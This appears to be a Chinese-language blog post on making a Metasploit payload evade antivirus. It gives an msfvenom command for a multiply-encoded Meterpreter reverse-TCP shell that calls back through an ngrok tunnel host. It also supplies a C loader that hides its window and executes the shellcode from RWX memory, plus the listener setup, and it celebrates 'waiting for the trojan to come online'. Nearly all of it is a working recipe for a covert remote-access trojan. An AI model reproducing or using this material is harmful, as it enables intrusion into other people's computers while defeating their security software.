metasploit生成的exe文件很小,但是免杀效果不行, 找了很多资料, 只有生成c语言shellcode,然后c#重新编译, 这种免杀效果,挺让人满意的
首先需要生成客户端,客户端使用了ngrok内网穿透,
root@kali:~/Desktop/sunny# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 14 lhost=freXe.idcfXXye.com lport=10068 -f c
将生成的shellcode替换到一下代码, 然后使用vs重新编译:
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")//不显示窗口
#include <stdio.h>
#define _WIN32_WINNT 0x0500
#include <windows.h>
#include <memory>
#include <memory.h>
unsigned char buf[] = "xxxxxxxxxxxxxxxxxxxxxxxxxxxx";void main() {
PVOID pAddr = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(pAddr, buf, sizeof(buf));
((void(*)())pAddr)();
}
完美过免S, 舒服了
监听本地端口
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.11
set LPORT 8000
exploit
坐等小马上线
参考:
https://www.freebuf.com/sectool/118714.html
天道酬勤
